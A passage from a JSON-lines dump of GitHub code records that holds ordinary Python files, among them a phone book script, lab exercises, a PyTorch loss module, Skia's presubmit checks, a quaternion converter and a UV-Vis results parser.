print((\"#\")*20, end=None)\n\n        # ask for a follow-up action\n        search_query = input(\"Keep searching? Y/N: \")\n        if search_query == 'Y':\n            search = ContactSearch()\n        elif search_query == 'N':\n\n            print((\"*\")*20, end=None)\n\n            search = \"You have exited the phone book\"\n            print(search)\n            print((\"*\")*20, end=None)\n            \n            sys.exit()\n        return search\n\ndef contactdelete():\n    lines = list()\n    members = input(\"Enter the number to delete\")\n    with open('data.csv', newline='') as delfile:\n        reader = csv.reader(delfile)\n        for row in reader:\n            lines.append(row)\n            for field in row:\n                if field == members:\n                    lines.remove(row)\n\n    # rewrite the CSV\n    with open(\"data.csv\", 'w', newline=\"\") as writeFile:\n        writer = csv.writer(writeFile)\n        writer.writerow(lines)\n        print(\"deleted.\")\n        print(lines)\n    sys.exit()\n\ndef main():\n    question = input(\n        \"What do we do? 
C: Add a contact, S: Search, D: Delete \")\n    if question == \"C\":\n        run_def = AddContact()\n    elif question == \"S\":\n        run_def = ContactSearch()\n    elif question == \"D\":\n        run_def = contactdelete()\n    return run_def\n\nmain()","repo_name":"Basmixer/Python-HW","sub_path":"HW_phonebook/telephonebook.py","file_name":"telephonebook.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"16424799748","text":"#Lab 3 - ITI1120 - Griffin Taylor\r\n#Exercise 1\r\ncounter = 10\r\nwhile(counter > 0):#Changed >= to > (only from 10 to 1, not 10 to 0)\r\n    print(counter)\r\n    counter = counter-1 #Changed + to -\r\n\r\n#Exercise 2\r\nn = int(input(\"Please give a value you would like to end at. \"))\r\ndef printerWhile(n):\r\n    counter = 1\r\n    while(counter<=n):\r\n        print(counter)\r\n        counter+=1\r\nprinterWhile(n)\r\ndef printerFor(n):\r\n    for x in range (1,n+1):#Have to add +1 for inclusivity\r\n        print(x)\r\nprinterFor(n)\r\n\r\nprint(\"\\n\")\r\n#Exercise 3\r\nimport random\r\nvalue = random.randint(1,10)\r\ndef guess(value):\r\n    counter = 1\r\n    gValue = int(input(\"Please guess a number between 1 and 10. \"))\r\n    while(gValue!=value):\r\n        counter+= 1\r\n        if(gValue > value):\r\n            print(\"Too large\")\r\n        else:\r\n            print(\"Too small\")\r\n        gValue = int(input(\"That was incorrect, please guess again. \"))\r\n    \r\n    print(\"That was correct! It took you \"+str(counter),\"tries to guess it. \")\r\nguess(value)\r\n\r\nprint(\"\\n\")\r\n#Exercise 4\r\ninput4 = int(input(\"Provide a positive number. \"))\r\nwhile(input4<0):\r\n    input4 = int(input(\"That is negative. Please provide a positive number. \"))\r\ndef ComputeFact(input4):\r\n    factorial = 1\r\n    if(input4 > 1):\r\n        for x in range(2,input4+1):\r\n            factorial*= x\r\n    print(\"The factorial of \"+str(input4),\"is \"+str(factorial))\r\nComputeFact(input4)\r\n","repo_name":"Zander-9909/University-Work","sub_path":"ITI1120/Lab3.py","file_name":"Lab3.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"73563236006","text":"\"\"\"\nModule: loss.py\nAuthors: Christian Bergler, Manuel Schmitt, Hendrik Schroeter\nLicense: GNU General Public License v3.0\nInstitution: Friedrich-Alexander-University Erlangen-Nuremberg, Department of Computer Science, Pattern Recognition Lab\nLast Access: 26.04.2022\n\"\"\"\n\n\nimport torch\nimport torch.nn as nn\n\n\nclass DeepFeatureLoss(nn.Module):\n    \"\"\"Reduces the loss for parts where the ground truth spectrogram is 0 for all\n    frequencies.\n    \"\"\"\n\n    def __init__(self, freq_dim=-1, reduction=\"elementwise_mean\"):\n        super().__init__()\n        self.mse = nn.MSELoss(reduction=\"none\")\n        self.freq_dim = freq_dim\n        self.reduction = reduction\n\n    def __call__(self, recon_x, x):\n        mse_ = self.mse(recon_x, x).sum(dim=self.freq_dim)\n        mse_tmp = mse_.clone()\n        relevant = torch.where(\n            torch.gt(x.sum(dim=self.freq_dim), 0.), mse_, mse_tmp.mul_(0.1)\n        )\n        if self.reduction == \"elementwise_mean\":\n            relevant = relevant.mean()\n        elif self.reduction == \"sum\":\n            relevant = relevant.sum()\n\n        return relevant\n","repo_name":"ChristianBergler/ORCA-SLANG","sub_path":"orca-slang/models/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"}
{"seq_id":"12740930825","text":"import collections\nimport csv\nimport fnmatch\nimport 
os\nimport re\nimport subprocess\nimport sys\nimport traceback\n\n\nREVERT_CL_SUBJECT_PREFIX = 'Revert '\n\nSKIA_TREE_STATUS_URL = 'http://skia-tree-status.appspot.com'\n\n# Please add the complete email address here (and not just 'xyz@' or 'xyz').\nPUBLIC_API_OWNERS = (\n    'reed@chromium.org',\n    'reed@google.com',\n    'bsalomon@chromium.org',\n    'bsalomon@google.com',\n    'djsollen@chromium.org',\n    'djsollen@google.com',\n    'hcm@chromium.org',\n    'hcm@google.com',\n)\n\nAUTHORS_FILE_NAME = 'AUTHORS'\n\nDOCS_PREVIEW_URL = 'https://skia.org/?cl='\nGOLD_TRYBOT_URL = 'https://gold.skia.org/search?issue='\n\n# Path to CQ bots feature is described in https://bug.skia.org/4364\nPATH_PREFIX_TO_EXTRA_TRYBOTS = {\n    'src/opts/': ('skia.primary:'\n      'Test-Debian9-Clang-GCE-CPU-AVX2-x86_64-Release-All-SKNX_NO_SIMD'),\n    'include/private/SkAtomics.h': ('skia.primary:'\n      'Test-Debian9-Clang-GCE-CPU-AVX2-x86_64-Release-All-TSAN,'\n      'Test-Ubuntu17-Clang-Golo-GPU-QuadroP400-x86_64-Release-All-TSAN'\n    ),\n\n    # Below are examples to show what is possible with this feature.\n    # 'src/svg/': 'master1:abc;master2:def',\n    # 'src/svg/parser/': 'master3:ghi,jkl;master4:mno',\n    # 'src/image/SkImage_Base.h': 'master5:pqr,stu;master1:abc1;master2:def',\n}\n\nSERVICE_ACCOUNT_SUFFIX = [\n    '@%s.iam.gserviceaccount.com' % project for project in [\n        'skia-buildbots.google.com', 'skia-swarming-bots']]\n\n\ndef _CheckChangeHasEol(input_api, output_api, source_file_filter=None):\n  \"\"\"Checks that files end with at least one \\n (LF).\"\"\"\n  eof_files = []\n  for f in input_api.AffectedSourceFiles(source_file_filter):\n    contents = input_api.ReadFile(f, 'rb')\n    # Check that the file ends in at least one newline character.\n    if len(contents) > 1 and contents[-1:] != '\\n':\n      eof_files.append(f.LocalPath())\n\n  if eof_files:\n    return [output_api.PresubmitPromptWarning(\n      'These files should end in a newline character:',\n      items=eof_files)]\n  return []\n\n\ndef _PythonChecks(input_api, output_api):\n  \"\"\"Run checks on any modified Python files.\"\"\"\n  pylint_disabled_files = (\n      'infra/bots/recipes.py',\n  )\n  pylint_disabled_warnings = (\n      'F0401', # Unable to import.\n      'E0611', # No name in module.\n      'W0232', # Class has no __init__ method.\n      'E1002', # Use of super on an old style class.\n      'W0403', # Relative import used.\n      'R0201', # Method could be a function.\n      'E1003', # Using class name in super.\n      'W0613', # Unused argument.\n      'W0105', # String statement has no effect.\n  )\n  # Run Pylint on only the modified python files. 
Unfortunately it still runs\n # Pylint on the whole file instead of just the modified lines.\n affected_python_files = []\n for affected_file in input_api.AffectedSourceFiles(None):\n affected_file_path = affected_file.LocalPath()\n if affected_file_path.endswith('.py'):\n if affected_file_path not in pylint_disabled_files:\n affected_python_files.append(affected_file_path)\n return input_api.canned_checks.RunPylint(\n input_api, output_api,\n disabled_warnings=pylint_disabled_warnings,\n white_list=affected_python_files)\n\n\ndef _JsonChecks(input_api, output_api):\n \"\"\"Run checks on any modified json files.\"\"\"\n failing_files = []\n for affected_file in input_api.AffectedFiles(None):\n affected_file_path = affected_file.LocalPath()\n is_json = affected_file_path.endswith('.json')\n is_metadata = (affected_file_path.startswith('site/') and\n affected_file_path.endswith('/METADATA'))\n if is_json or is_metadata:\n try:\n input_api.json.load(open(affected_file_path, 'r'))\n except ValueError:\n failing_files.append(affected_file_path)\n\n results = []\n if failing_files:\n results.append(\n output_api.PresubmitError(\n 'The following files contain invalid json:\\n%s\\n\\n' %\n '\\n'.join(failing_files)))\n return results\n\n\ndef _IfDefChecks(input_api, output_api):\n \"\"\"Ensures if/ifdef are not before includes. See skbug/3362 for details.\"\"\"\n comment_block_start_pattern = re.compile('^\\s*\\/\\*.*$')\n comment_block_middle_pattern = re.compile('^\\s+\\*.*')\n comment_block_end_pattern = re.compile('^\\s+\\*\\/.*$')\n single_line_comment_pattern = re.compile('^\\s*//.*$')\n def is_comment(line):\n return (comment_block_start_pattern.match(line) or\n comment_block_middle_pattern.match(line) or\n comment_block_end_pattern.match(line) or\n single_line_comment_pattern.match(line))\n\n empty_line_pattern = re.compile('^\\s*$')\n def is_empty_line(line):\n return empty_line_pattern.match(line)\n\n failing_files = []\n for affected_file in input_api.AffectedSourceFiles(None):\n affected_file_path = affected_file.LocalPath()\n if affected_file_path.endswith('.cpp') or affected_file_path.endswith('.h'):\n f = open(affected_file_path)\n for line in f.xreadlines():\n if is_comment(line) or is_empty_line(line):\n continue\n # The below will be the first real line after comments and newlines.\n if line.startswith('#if 0 '):\n pass\n elif line.startswith('#if ') or line.startswith('#ifdef '):\n failing_files.append(affected_file_path)\n break\n\n results = []\n if failing_files:\n results.append(\n output_api.PresubmitError(\n 'The following files have #if or #ifdef before includes:\\n%s\\n\\n'\n 'See https://bug.skia.org/3362 for why this should be fixed.' %\n '\\n'.join(failing_files)))\n return results\n\n\ndef _CopyrightChecks(input_api, output_api, source_file_filter=None):\n results = []\n year_pattern = r'\\d{4}'\n year_range_pattern = r'%s(-%s)?' % (year_pattern, year_pattern)\n years_pattern = r'%s(,%s)*,?' % (year_range_pattern, year_range_pattern)\n copyright_pattern = (\n r'Copyright (\\([cC]\\) )?%s \\w+' % years_pattern)\n\n for affected_file in input_api.AffectedSourceFiles(source_file_filter):\n if 'third_party' in affected_file.LocalPath():\n continue\n contents = input_api.ReadFile(affected_file, 'rb')\n if not re.search(copyright_pattern, contents):\n results.append(output_api.PresubmitError(\n '%s is missing a correct copyright header.' 
% affected_file))\n return results\n\n\ndef _ToolFlags(input_api, output_api):\n \"\"\"Make sure `{dm,nanobench}_flags.py test` passes if modified.\"\"\"\n results = []\n sources = lambda x: ('dm_flags.py' in x.LocalPath() or\n 'nanobench_flags.py' in x.LocalPath())\n for f in input_api.AffectedSourceFiles(sources):\n if 0 != subprocess.call(['python', f.LocalPath(), 'test']):\n results.append(output_api.PresubmitError('`python %s test` failed' % f))\n return results\n\n\ndef _InfraTests(input_api, output_api):\n \"\"\"Run the infra tests.\"\"\"\n results = []\n if not any(f.LocalPath().startswith('infra')\n for f in input_api.AffectedFiles()):\n return results\n\n cmd = ['python', os.path.join('infra', 'bots', 'infra_tests.py')]\n try:\n subprocess.check_output(cmd)\n except subprocess.CalledProcessError as e:\n results.append(output_api.PresubmitError(\n '`%s` failed:\\n%s' % (' '.join(cmd), e.output)))\n return results\n\n\ndef _CheckGNFormatted(input_api, output_api):\n \"\"\"Make sure any .gn files we're changing have been formatted.\"\"\"\n results = []\n for f in input_api.AffectedFiles():\n if (not f.LocalPath().endswith('.gn') and\n not f.LocalPath().endswith('.gni')):\n continue\n\n gn = 'gn.bat' if 'win32' in sys.platform else 'gn'\n cmd = [gn, 'format', '--dry-run', f.LocalPath()]\n try:\n subprocess.check_output(cmd)\n except subprocess.CalledProcessError:\n fix = 'gn format ' + f.LocalPath()\n results.append(output_api.PresubmitError(\n '`%s` failed, try\\n\\t%s' % (' '.join(cmd), fix)))\n return results\n\n\ndef _CommonChecks(input_api, output_api):\n \"\"\"Presubmit checks common to upload and commit.\"\"\"\n results = []\n sources = lambda x: (x.LocalPath().endswith('.h') or\n x.LocalPath().endswith('.py') or\n x.LocalPath().endswith('.sh') or\n x.LocalPath().endswith('.m') or\n x.LocalPath().endswith('.mm') or\n x.LocalPath().endswith('.go') or\n x.LocalPath().endswith('.c') or\n x.LocalPath().endswith('.cc') or\n x.LocalPath().endswith('.cpp'))\n results.extend(\n _CheckChangeHasEol(\n input_api, output_api, source_file_filter=sources))\n results.extend(\n input_api.canned_checks.CheckChangeHasNoCR(\n input_api, output_api, source_file_filter=sources))\n results.extend(\n input_api.canned_checks.CheckChangeHasNoStrayWhitespace(\n input_api, output_api, source_file_filter=sources))\n results.extend(_PythonChecks(input_api, output_api))\n results.extend(_JsonChecks(input_api, output_api))\n results.extend(_IfDefChecks(input_api, output_api))\n results.extend(_CopyrightChecks(input_api, output_api,\n source_file_filter=sources))\n results.extend(_ToolFlags(input_api, output_api))\n return results\n\n\ndef CheckChangeOnUpload(input_api, output_api):\n \"\"\"Presubmit checks for the change on upload.\n\n The following are the presubmit checks:\n * Check change has one and only one EOL.\n \"\"\"\n results = []\n results.extend(_CommonChecks(input_api, output_api))\n # Run on upload, not commit, since the presubmit bot apparently doesn't have\n # coverage or Go installed.\n results.extend(_InfraTests(input_api, output_api))\n\n results.extend(_CheckGNFormatted(input_api, output_api))\n return results\n\n\ndef _CheckTreeStatus(input_api, output_api, json_url):\n \"\"\"Check whether to allow commit.\n\n Args:\n input_api: input related apis.\n output_api: output related apis.\n json_url: url to download json style status.\n \"\"\"\n tree_status_results = input_api.canned_checks.CheckTreeIsOpen(\n input_api, output_api, json_url=json_url)\n if not tree_status_results:\n # Check 
for caution state only if tree is not closed.\n connection = input_api.urllib2.urlopen(json_url)\n status = input_api.json.loads(connection.read())\n connection.close()\n if ('caution' in status['message'].lower() and\n os.isatty(sys.stdout.fileno())):\n # Display a prompt only if we are in an interactive shell. Without this\n # check the commit queue behaves incorrectly because it considers\n # prompts to be failures.\n short_text = 'Tree state is: ' + status['general_state']\n long_text = status['message'] + '\\n' + json_url\n tree_status_results.append(\n output_api.PresubmitPromptWarning(\n message=short_text, long_text=long_text))\n else:\n # Tree status is closed. Put in message about contacting sheriff.\n connection = input_api.urllib2.urlopen(\n SKIA_TREE_STATUS_URL + '/current-sheriff')\n sheriff_details = input_api.json.loads(connection.read())\n if sheriff_details:\n tree_status_results[0]._message += (\n '\\n\\nPlease contact the current Skia sheriff (%s) if you are trying '\n 'to submit a build fix\\nand do not know how to submit because the '\n 'tree is closed') % sheriff_details['username']\n return tree_status_results\n\n\nclass CodeReview(object):\n \"\"\"Abstracts which codereview tool is used for the specified issue.\"\"\"\n\n def __init__(self, input_api):\n self._issue = input_api.change.issue\n self._gerrit = input_api.gerrit\n\n def GetOwnerEmail(self):\n return self._gerrit.GetChangeOwner(self._issue)\n\n def GetSubject(self):\n return self._gerrit.GetChangeInfo(self._issue)['subject']\n\n def GetDescription(self):\n return self._gerrit.GetChangeDescription(self._issue)\n\n def IsDryRun(self):\n return self._gerrit.GetChangeInfo(\n self._issue)['labels']['Commit-Queue'].get('value', 0) == 1\n\n def GetReviewers(self):\n code_review_label = (\n self._gerrit.GetChangeInfo(self._issue)['labels']['Code-Review'])\n return [r['email'] for r in code_review_label.get('all', [])]\n\n def GetApprovers(self):\n approvers = []\n code_review_label = (\n self._gerrit.GetChangeInfo(self._issue)['labels']['Code-Review'])\n for m in code_review_label.get('all', []):\n if m.get(\"value\") == 1:\n approvers.append(m[\"email\"])\n return approvers\n\n\ndef _CheckOwnerIsInAuthorsFile(input_api, output_api):\n results = []\n if input_api.change.issue:\n cr = CodeReview(input_api)\n\n owner_email = cr.GetOwnerEmail()\n\n # Service accounts don't need to be in AUTHORS.\n for suffix in SERVICE_ACCOUNT_SUFFIX:\n if owner_email.endswith(suffix):\n return results\n\n try:\n authors_content = ''\n for line in open(AUTHORS_FILE_NAME):\n if not line.startswith('#'):\n authors_content += line\n email_fnmatches = re.findall('<(.*)>', authors_content)\n for email_fnmatch in email_fnmatches:\n if fnmatch.fnmatch(owner_email, email_fnmatch):\n # Found a match, the user is in the AUTHORS file break out of the loop\n break\n else:\n results.append(\n output_api.PresubmitError(\n 'The email %s is not in Skia\\'s AUTHORS file.\\n'\n 'Issue owner, this CL must include an addition to the Skia AUTHORS '\n 'file.'\n % owner_email))\n except IOError:\n # Do not fail if authors file cannot be found.\n traceback.print_exc()\n input_api.logging.error('AUTHORS file not found!')\n\n return results\n\n\ndef _CheckLGTMsForPublicAPI(input_api, output_api):\n \"\"\"Check LGTMs for public API changes.\n\n For public API files make sure there is an LGTM from the list of owners in\n PUBLIC_API_OWNERS.\n \"\"\"\n results = []\n requires_owner_check = False\n for affected_file in input_api.AffectedFiles():\n 
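# added note: a single modified public header is enough to trigger the owners check below\n    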
affected_file_path = affected_file.LocalPath()\n file_path, file_ext = os.path.splitext(affected_file_path)\n # We only care about files that end in .h and are under the top-level\n # include dir, but not include/private.\n if (file_ext == '.h' and\n 'include' == file_path.split(os.path.sep)[0] and\n 'private' not in file_path):\n requires_owner_check = True\n\n if not requires_owner_check:\n return results\n\n lgtm_from_owner = False\n if input_api.change.issue:\n cr = CodeReview(input_api)\n\n if re.match(REVERT_CL_SUBJECT_PREFIX, cr.GetSubject(), re.I):\n # It is a revert CL, ignore the public api owners check.\n return results\n\n if cr.IsDryRun():\n # Ignore public api owners check for dry run CLs since they are not\n # going to be committed.\n return results\n\n if input_api.gerrit:\n for reviewer in cr.GetReviewers():\n if reviewer in PUBLIC_API_OWNERS:\n # If an owner is specified as an reviewer in Gerrit then ignore the\n # public api owners check.\n return results\n else:\n match = re.search(r'^TBR=(.*)$', cr.GetDescription(), re.M)\n if match:\n tbr_section = match.group(1).strip().split(' ')[0]\n tbr_entries = tbr_section.split(',')\n for owner in PUBLIC_API_OWNERS:\n if owner in tbr_entries or owner.split('@')[0] in tbr_entries:\n # If an owner is specified in the TBR= line then ignore the public\n # api owners check.\n return results\n\n if cr.GetOwnerEmail() in PUBLIC_API_OWNERS:\n # An owner created the CL that is an automatic LGTM.\n lgtm_from_owner = True\n\n for approver in cr.GetApprovers():\n if approver in PUBLIC_API_OWNERS:\n # Found an lgtm in a message from an owner.\n lgtm_from_owner = True\n break\n\n if not lgtm_from_owner:\n results.append(\n output_api.PresubmitError(\n \"If this CL adds to or changes Skia's public API, you need an LGTM \"\n \"from any of %s. If this CL only removes from or doesn't change \"\n \"Skia's public API, please add a short note to the CL saying so. \"\n \"Add one of the owners as a reviewer to your CL as well as to the \"\n \"TBR= line. If you don't know if this CL affects Skia's public \"\n \"API, treat it like it does.\" % str(PUBLIC_API_OWNERS)))\n return results\n\n\ndef _FooterExists(footers, key, value):\n for k, v in footers:\n if k == key and v == value:\n return True\n return False\n\n\ndef PostUploadHook(cl, change, output_api):\n \"\"\"git cl upload will call this hook after the issue is created/modified.\n\n This hook does the following:\n * Adds a link to preview docs changes if there are any docs changes in the CL.\n * Adds 'No-Try: true' if the CL contains only docs changes.\n * Adds 'No-Tree-Checks: true' for non master branch changes since they do not\n need to be gated on the master branch's tree.\n * Adds 'No-Try: true' for non master branch changes since trybots do not yet\n work on them.\n * Adds 'No-Presubmit: true' for non master branch changes since those don't\n run the presubmit checks.\n * Adds extra trybots for the paths defined in PATH_TO_EXTRA_TRYBOTS.\n \"\"\"\n\n results = []\n atleast_one_docs_change = False\n all_docs_changes = True\n for affected_file in change.AffectedFiles():\n affected_file_path = affected_file.LocalPath()\n file_path, _ = os.path.splitext(affected_file_path)\n if 'site' == file_path.split(os.path.sep)[0]:\n atleast_one_docs_change = True\n else:\n all_docs_changes = False\n if atleast_one_docs_change and not all_docs_changes:\n break\n\n issue = cl.issue\n if issue:\n # Skip PostUploadHooks for all auto-commit service account bots. 
New\n # patchsets (caused due to PostUploadHooks) invalidates the CQ+2 vote from\n # the \"--use-commit-queue\" flag to \"git cl upload\".\n for suffix in SERVICE_ACCOUNT_SUFFIX:\n if cl.GetIssueOwner().endswith(suffix):\n return results\n\n original_description_lines, footers = cl.GetDescriptionFooters()\n new_description_lines = list(original_description_lines)\n\n # If the change includes only doc changes then add No-Try: true in the\n # CL's description if it does not exist yet.\n if all_docs_changes and not _FooterExists(footers, 'No-Try', 'true'):\n new_description_lines.append('No-Try: true')\n results.append(\n output_api.PresubmitNotifyResult(\n 'This change has only doc changes. Automatically added '\n '\\'No-Try: true\\' to the CL\\'s description'))\n\n # If there is atleast one docs change then add preview link in the CL's\n # description if it does not already exist there.\n docs_preview_link = '%s%s' % (DOCS_PREVIEW_URL, issue)\n docs_preview_line = 'Docs-Preview: %s' % docs_preview_link\n if (atleast_one_docs_change and\n not _FooterExists(footers, 'Docs-Preview', docs_preview_link)):\n # Automatically add a link to where the docs can be previewed.\n new_description_lines.append(docs_preview_line)\n results.append(\n output_api.PresubmitNotifyResult(\n 'Automatically added a link to preview the docs changes to the '\n 'CL\\'s description'))\n\n # If the target ref is not master then add 'No-Tree-Checks: true' and\n # 'No-Try: true' to the CL's description if it does not already exist there.\n target_ref = cl.GetRemoteBranch()[1]\n if target_ref != 'refs/remotes/origin/master':\n if not _FooterExists(footers, 'No-Tree-Checks', 'true'):\n new_description_lines.append('No-Tree-Checks: true')\n results.append(\n output_api.PresubmitNotifyResult(\n 'Branch changes do not need to rely on the master branch\\'s '\n 'tree status. Automatically added \\'No-Tree-Checks: true\\' to '\n 'the CL\\'s description'))\n if not _FooterExists(footers, 'No-Try', 'true'):\n new_description_lines.append('No-Try: true')\n results.append(\n output_api.PresubmitNotifyResult(\n 'Trybots do not yet work for non-master branches. '\n 'Automatically added \\'No-Try: true\\' to the CL\\'s '\n 'description'))\n if not _FooterExists(footers, 'No-Presubmit', 'true'):\n new_description_lines.append('No-Presubmit: true')\n results.append(\n output_api.PresubmitNotifyResult(\n 'Branch changes do not run the presubmit checks.'))\n\n # Automatically set Cq-Include-Trybots if any of the changed files here\n # begin with the paths of interest.\n bots_to_include = []\n for affected_file in change.AffectedFiles():\n affected_file_path = affected_file.LocalPath()\n for path_prefix, extra_bots in PATH_PREFIX_TO_EXTRA_TRYBOTS.iteritems():\n if affected_file_path.startswith(path_prefix):\n results.append(\n output_api.PresubmitNotifyResult(\n 'Your CL modifies the path %s.\\nAutomatically adding %s to '\n 'the CL description.' 
% (affected_file_path, extra_bots)))\n bots_to_include.append(extra_bots)\n if bots_to_include:\n output_api.EnsureCQIncludeTrybotsAreAdded(\n cl, bots_to_include, new_description_lines)\n\n # If the description has changed update it.\n if new_description_lines != original_description_lines:\n # Add a new line separating the new contents from the old contents.\n new_description_lines.insert(len(original_description_lines), '')\n cl.UpdateDescriptionFooters(new_description_lines, footers)\n\n return results\n\n\ndef CheckChangeOnCommit(input_api, output_api):\n \"\"\"Presubmit checks for the change on commit.\n\n The following are the presubmit checks:\n * Check change has one and only one EOL.\n * Ensures that the Skia tree is open in\n http://skia-tree-status.appspot.com/. Shows a warning if it is in 'Caution'\n state and an error if it is in 'Closed' state.\n \"\"\"\n results = []\n results.extend(_CommonChecks(input_api, output_api))\n results.extend(\n _CheckTreeStatus(input_api, output_api, json_url=(\n SKIA_TREE_STATUS_URL + '/banner-status?format=json')))\n results.extend(_CheckLGTMsForPublicAPI(input_api, output_api))\n results.extend(_CheckOwnerIsInAuthorsFile(input_api, output_api))\n # Checks for the presence of 'DO NOT''SUBMIT' in CL description and in\n # content of files.\n results.extend(\n input_api.canned_checks.CheckDoNotSubmit(input_api, output_api))\n return results\n","repo_name":"kiwibrowser/src","sub_path":"third_party/skia/PRESUBMIT.py","file_name":"PRESUBMIT.py","file_ext":"py","file_size_in_byte":22455,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"26714636079","text":"# -*- coding: utf-8 -*-\n\nimport collections\nimport logging\nfrom os import getlogin\nfrom platform import node as comp_name\n\nAPP_TYPE_MANAGED = 'managed'\nAPP_TYPE_ORDINARY = 'ordinary'\n\nFORM_MANAGED = 'FormManaged'\nFORM_ORDINARY = 'FormOrdinary'\nCOMMON_MODULE = 'CommonModule'\nDATA_PROCESSOR = 'DataProcessor'\n\nMoveConfiguration = collections.namedtuple('MoveConfiguration', ['primary_form_config', 'secondary_forms_config'])\n\nPrimaryModuleConfiguration = collections.namedtuple('PrimaryModuleConfiguration',\n ['functions_to_move',\n 'export_functions',\n 'dp_module_chain'])\n\nSecondaryFormsConfiguration = collections.namedtuple('SecondaryFormsConfiguration',\n ['functions_to_move_dict',\n 'replace_calls_to_primary_module',\n 'wrapper_calls',\n 'export_functions'])\n\nBuildParams = collections.namedtuple('ProcessingParams', ['object_name',\n 'main_managed_form',\n 'managed_forms',\n 'ordinary_forms'])\n\n__ENV_DESC = {'user': getlogin(), 'comp': comp_name()}\n__LOGGER = logging.getLogger('epfcomp')\n\ndef __init_logging():\n formatter = logging.Formatter('%(asctime)s %(comp)s(%(user)s)- %(levelname)s: %(message)s')\n # Вывод данных логирования в консоль\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(formatter)\n __LOGGER.addHandler(ch)\n __LOGGER.setLevel(logging.INFO)\n\ndef log(msg, *args):\n __LOGGER.info(msg, *args, extra=__ENV_DESC)\n\n__init_logging()\n\nif __name__ == '__main__':\n log('Пример сообщения логирования')\n","repo_name":"musiy/asmbl","sub_path":"base_const.py","file_name":"base_const.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19380087370","text":"# function that converts the quaterions in the state to euler angles\n\nimport numpy as np\n\ndef 
quat2euler(quaternion):\n\tq0 = quaternion[0,0]\n\tq1 = quaternion[1,0]\n\tq2 = quaternion[2,0]\n\tq3 = quaternion[3,0]\n\n\t# arctan2 (rather than arctan of a quotient) keeps roll and yaw in the correct quadrant\n\ta = np.arctan2(2 * (q0*q1 + q2*q3), 1 - 2*(q1*q1 + q2*q2))\n\tb = np.arcsin(2 * (q0*q2 - q3*q1) )\n\tc = np.arctan2(2 * (q0*q3 + q1*q2), 1 - 2*(q2*q2 + q3*q3))\n\ttemp = 180/np.pi\n\teuler = np.transpose(np.array([[temp * a,temp * b,temp * c]]))\n\n\treturn euler\n","repo_name":"Robert108/SSY226_VRU_repo","sub_path":"PythonDev/quat2euler.py","file_name":"quat2euler.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"13468285310","text":"#!/usr/bin/env python3\n\n\"\"\"\nFile: uv_vis.py\nAuthor: Tom Mason\nEmail: tommason14@gmail.com\nGithub: https://github.com/tommason14\nDescription: This pulls UV-Vis data from Orca and Gaussian\nlog files. Note that this script does not account for fluorescence,\nbut only because of the NA given for the root. This can easily be \nchanged.\n\"\"\"\n\nfrom autochem import GaussianResults, OrcaResults, get_log_type\nfrom glob import glob\nfrom tqdm import tqdm\nimport sys\n\n\ndef results_filename():\n    if len(sys.argv) > 2:\n        sys.exit(\"Syntax: uv_vis.py <filename>\")\n    if len(sys.argv) == 2:\n        return sys.argv[1]\n    return \"uv_vis.csv\"\n\n\ndef results(logfile):\n    \"\"\"\n    Returns the results class of Orca and Gaussian log files.\n    If log is of a different type, returns None.\n    \"\"\"\n    _types = {\"gaussian\": GaussianResults, \"orca\": OrcaResults}\n\n    for key, val in _types.items():\n        # compare strings with ==, not identity\n        if get_log_type(logfile) == key:\n            return val(logfile)\n\n\ndef check_for_prog(lst):\n    \"\"\"\n    Decides if a progress bar is necessary or not\n    \"\"\"\n    if len(lst) > 5:\n        return tqdm(lst)\n    return lst\n\n\ndef write_results(filename):\n    with open(filename, \"w\") as f:\n        f.write(\n            \"Config,\" \"Root,\" \"Iteration,\" \"Transition Energies (eV),\" \"Wavelength (nm),\" \"Intensity (au)\\n\"\n        )\n        for logfile in check_for_prog(glob(\"**/*log\", recursive=True)):\n            log = results(logfile)\n            if log is None:\n                continue  # if not gaussian/orca job\n            for iteration, data in enumerate(\n                zip(log.td_dft_wavelengths, log.td_dft_intensities, log.td_dft_transition_energies,), 1,\n            ):\n                waves, ints, energies = data\n                for wave, intensity, energy in zip(waves, ints, energies):\n                    f.write(f\"{logfile},NA,{iteration},{energy},{wave},{intensity}\\n\")\n\n\ndef main():\n    filename = results_filename()\n    write_results(filename)\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"tommason14/scripts","sub_path":"chem/uv_vis.py","file_name":"uv_vis.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"}
{"seq_id":"27305179849","text":"import matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nimport seaborn as sns\r\nimport numpy as np\r\n\r\n# Data for plotting\r\nt = np.arange(0.0, 2.0, 0.01)\r\ns = 1 + np.sin(2 * np.pi * t)\r\n\r\ncolors=sns.color_palette(\"rocket\",3)\r\nmpl.rcParams['font.family'] = 'Avenir'\r\nmpl.rcParams['font.size']=12\r\n\r\n\r\nfig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex=True, sharey=True, figsize=(8,8))\r\n\r\nax1.plot(t, s, color=colors[0])\r\n\r\n\r\n#fig.set_title('simple plot')\r\nax3.set(xlabel='time(s)', ylabel='voltage (mv)',\r\n       title='$n=1$')\r\n\r\nplt.minorticks_on()\r\n\r\nfor ax in (ax1, ax2, ax3, ax4):\r\n    ax.tick_params(direction='in',which='minor', length=5, bottom=True, top=True, left=True, right=True)\r\n    
